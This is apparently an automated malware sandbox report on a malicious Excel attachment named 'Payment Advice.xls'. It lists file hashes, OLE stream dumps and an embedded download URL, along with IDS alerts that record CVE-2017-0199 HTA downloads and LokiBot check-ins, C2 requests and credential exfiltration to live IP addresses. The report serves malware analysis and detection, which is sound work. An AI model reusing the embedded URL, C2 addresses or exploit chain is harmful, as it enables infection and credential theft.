Preview:	......................>...................................$...........................................................f.......h.......................................................................................................................................................................................................................................................................................................................................................................................................!................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\Desktop\2D330000:Zone.Identifier

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Desktop\Payment Advice.xls (copy)

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Nov 21 00:20:57 2024, Security: 1
Category:	dropped
Size (bytes):	935936
Entropy (8bit):	7.986071502419832
Encrypted:	false
SSDEEP:	12288:pI99FGvFclV7LdlW5VRqfPSMCfhhBK2leSPKpWAM6BPLwdnhr8y/mVqsn8qiaapB:qF8FclVLdSRwSNjBK2pP3uTauiZs8h
MD5:	EA87FC894BA7415C83915F80E43B0CA9
SHA1:	7CEFD9D05D0ED4163EF060AD240D1925C36C9846
SHA-256:	1F9E81255F9750325B2C4A66B37C01C8391D05C157856A4E1051AAAEB0774835
SHA-512:	094617C2AFC0E58E3D6584F66FD010A906E36835CF707B6D0A5C314C30921A653213755B7486A4CEAF9857DFCD26BDA08918709CF0C3D37077E294DF65372DD6
Malicious:	true
Preview:	......................>...................................$...........................................................f.......h.......................................................................................................................................................................................................................................................................................................................................................................................................!................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 20 01:29:52 2024, Security: 1
Entropy (8bit):	7.9810419545717215
TrID:	Microsoft Excel sheet (30009/1) 47.99% Microsoft Excel sheet (alternate) (24509/1) 39.20% Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name:	Payment Advice.xls
File size:	1'136'128 bytes
MD5:	5a69ac58c3133e24a783cf4ea670a243
SHA1:	7fdf7feed6f105ce6bfeb34fb44c9c58dfe9057e
SHA256:	f942a3046520f7838e33a1116faf8b9a6615756f044551651207f53b755a024d
SHA512:	5b338a97aacf226f9e4360eec8fa2149cb5a77836f357e76c276a799625f91ceb4c9b49c0ef13a9fc31a98770eb0088192ba0b05b2ec668beaa5cd71ccc30c04
SSDEEP:	24576:auq9PLiijE2Z5Z2amwshXCdQtF84LJQohL7m90Ns4Ql1xzRjpCrHac:auEPLiij7Z5ZKwsAsFjLJQohm90Clvzu
TLSH:	89352355F985EF06D69BA9320CA3D8F22408BC83BF69A2422730779F647D1F81F47195
File Content Preview:	........................>.......................................................................................................i.......k.......m..............................................................................................................

File Icon


Icon Hash:	276ea3a6a6b7bfbf

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "Payment Advice.xls"

Indicators

Has Summary Info:
Application Name:	Microsoft Excel
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary

Code Page:	1252
Author:
Last Saved By:
Create Time:	2006-09-16 00:00:00
Last Saved Time:	2024-11-20 01:29:52
Creating Application:	Microsoft Excel
Security:	1

Document Summary

Document Code Page:	1252
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	786432

Streams with VBA

VBA File Name: Sheet1.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w I m . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 77 49 6d 84 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet2.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet2
VBA File Name:	Sheet2.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w I 7 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 77 49 37 ef 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet3.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet3
VBA File Name:	Sheet3.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w I . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 77 49 e2 95 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: ThisWorkbook.cls, Stream Size: 985

General
Stream Path:	_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	985
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w I K K . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 77 49 4b 4b 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244

General
Stream Path:	\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	244
Entropy:	2.889430592781307
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200

General
Stream Path:	\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	200
Entropy:	3.2603503175049817
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . \| . # . @ . . . . B : . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00

Stream Path: MBD001C4526/\x1CompObj, File Type: data, Stream Size: 99

General
Stream Path:	MBD001C4526/\x1CompObj
CLSID:
File Type:	data
Stream Size:	99
Entropy:	3.631242196770981
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD001C4526/Package, File Type: Microsoft Excel 2007+, Stream Size: 781880

General
Stream Path:	MBD001C4526/Package
CLSID:
File Type:	Microsoft Excel 2007+
Stream Size:	781880
Entropy:	7.996310602391636
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . j A 3 . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 6a 41 33 c9 e9 01 00 00 fc 08 00 00 13 00 e1 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dd 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD001C4527/\x1Ole, File Type: data, Stream Size: 376

General
Stream Path:	MBD001C4527/\x1Ole
CLSID:
File Type:	data
Stream Size:	376
Entropy:	4.942740636887529
Base64 Encoded:	False
Data ASCII:	. . . . . g y M t H . . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . p . r . o . v . i . t . . . u . k . / . C . x . d . O . H . 5 . ? . & . r . a . d . a . r . = . s . n . e . a . k . y . & . p . s . y . c . h . o . l . o . g . y . = . o . u . t . s . t . a . n . d . i . n . g . & . s . h . e . r . r . y . = . s . p . o . t . l . e . s . s . & . s . u . g . g . e . s . t . i . o . n . . . . . . . . \\ f . . V C . . T . = . o % % B . . d . [ M . . G t . . . . . ' u . . . . .
Data Raw:	01 00 00 02 e5 2e f9 67 79 4d 74 48 00 00 00 00 00 00 00 00 00 00 00 00 02 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b fe 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 70 00 72 00 6f 00 76 00 69 00 74 00 2e 00 75 00 6b 00 2f 00 43 00 78 00 64 00 4f 00 48 00 35 00 3f 00 26 00 72 00 61 00 64 00 61 00 72 00 3d 00 73 00 6e 00 65 00 61 00 6b 00 79 00 26 00 70 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 330975

General
Stream Path:	Workbook
CLSID:
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	330975
Entropy:	7.998619981607586
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . / . 6 . . . . . . . h 6 T . x ] y } . . + 3 . G . } x S 9 # . 9 i . . . . . . . . . . \\ . p . . ) < r T . 9 8 g . b 1 - : z f . 0 y ~ ; . . y W T . v = . % : * . . ~ . . K Y ] n . . I . 6 p . . . D . . y L W ' P . ] m Q B . . . a a . . . , F . . . = . . . V . . . . . Z s : ? 1 . * e f . . . D . . . . . . . . Y X . . . . 9 . . . y m . . . k = . . . V [ . . 2 * . , . B @ . . . . 6 . . . U g " . . . b . . . . . . . . . ( . . . 1 . . . . . g Z ? { . . . [ " E n ; . 1 . .
Data Raw:	09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 68 36 54 c8 a3 78 b5 8b d3 5d c1 ad ad c7 79 fe 7d 18 b7 a8 13 c5 f2 2b a0 ed 20 33 0a 89 a9 91 47 0e 9e 7d 80 ad 78 53 39 a4 e5 23 12 39 69 dd e1 00 02 00 b0 04 c1 00 02 00 a0 f6 e2 00 00 00 5c 00 70 00 ba a2 17 fc ad 29 e1 3c 72 54 0f ff 39 38 a6 c7 67 07 e6 d6 df 62 a5 a4 c2 31 a8 2d e5 3a

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 521

General
Stream Path:	_VBA_PROJECT_CUR/PROJECT
CLSID:
File Type:	ASCII text, with CRLF line terminators
Stream Size:	521
Entropy:	5.239208668467886
Base64 Encoded:	True
Data ASCII:	I D = " { 3 B 2 B 0 5 4 3 - D 6 0 8 - 4 9 F 8 - B 6 C 9 - 3 3 3 E 2 A C 0 9 1 D 7 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 4 1 4 3 8 A 0 A 8 E 0 A 8 E 0 A 8
Data Raw:	49 44 3d 22 7b 33 42 32 42 30 35 34 33 2d 44 36 30 38 2d 34 39 46 38 2d 42 36 43 39 2d 33 33 33 45 32 41 43 30 39 31 44 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
CLSID:
File Type:	data
Stream Size:	104
Entropy:	3.0488640812019017
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644

General
Stream Path:	_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
CLSID:
File Type:	data
Stream Size:	2644
Entropy:	3.981744704608686
Base64 Encoded:	False
Data ASCII:	a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
Data Raw:	cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00

Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553

General
Stream Path:	_VBA_PROJECT_CUR/VBA/dir
CLSID:
File Type:	data
Stream Size:	553
Entropy:	6.3652621927289355
Base64 Encoded:	True
Data ASCII:	. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . O i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
Data Raw:	01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 c9 83 4f 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-21T01:20:32.545546+0100	2024449	ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl	1	192.168.2.22	49162	192.3.243.136	80	TCP
2024-11-21T01:20:32.545592+0100	2024197	ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)	1	192.3.243.136	80	192.168.2.22	49162	TCP
2024-11-21T01:20:37.352114+0100	2024449	ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl	1	192.168.2.22	49164	192.3.243.136	80	TCP
2024-11-21T01:20:37.352153+0100	2024197	ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)	1	192.3.243.136	80	192.168.2.22	49164	TCP
2024-11-21T01:21:01.047198+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49167	94.156.177.41	80	TCP
2024-11-21T01:21:01.047198+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49167	94.156.177.41	80	TCP
2024-11-21T01:21:01.047198+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49167	94.156.177.41	80	TCP
2024-11-21T01:21:02.419043+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.22	49167	94.156.177.41	80	TCP
2024-11-21T01:21:03.800167+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49168	94.156.177.41	80	TCP
2024-11-21T01:21:03.800167+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49168	94.156.177.41	80	TCP
2024-11-21T01:21:03.800167+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49168	94.156.177.41	80	TCP
2024-11-21T01:21:05.204233+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.22	49168	94.156.177.41	80	TCP
2024-11-21T01:21:05.691982+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49172	94.156.177.41	80	TCP
2024-11-21T01:21:05.691982+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49172	94.156.177.41	80	TCP
2024-11-21T01:21:05.691982+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49172	94.156.177.41	80	TCP
2024-11-21T01:21:07.116232+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49172	94.156.177.41	80	TCP
2024-11-21T01:21:07.116232+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49172	94.156.177.41	80	TCP
2024-11-21T01:21:07.241320+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49172	TCP
2024-11-21T01:21:07.518236+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49173	94.156.177.41	80	TCP
2024-11-21T01:21:07.518236+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49173	94.156.177.41	80	TCP
2024-11-21T01:21:07.518236+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49173	94.156.177.41	80	TCP
2024-11-21T01:21:08.066236+0100	2024449	ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl	1	192.168.2.22	49171	192.3.243.136	80	TCP
2024-11-21T01:21:09.249159+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49173	94.156.177.41	80	TCP
2024-11-21T01:21:09.249159+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49173	94.156.177.41	80	TCP
2024-11-21T01:21:09.369304+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49173	TCP
2024-11-21T01:21:10.006433+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49174	94.156.177.41	80	TCP
2024-11-21T01:21:10.006433+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49174	94.156.177.41	80	TCP
2024-11-21T01:21:10.006433+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49174	94.156.177.41	80	TCP
2024-11-21T01:21:11.401975+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49174	94.156.177.41	80	TCP
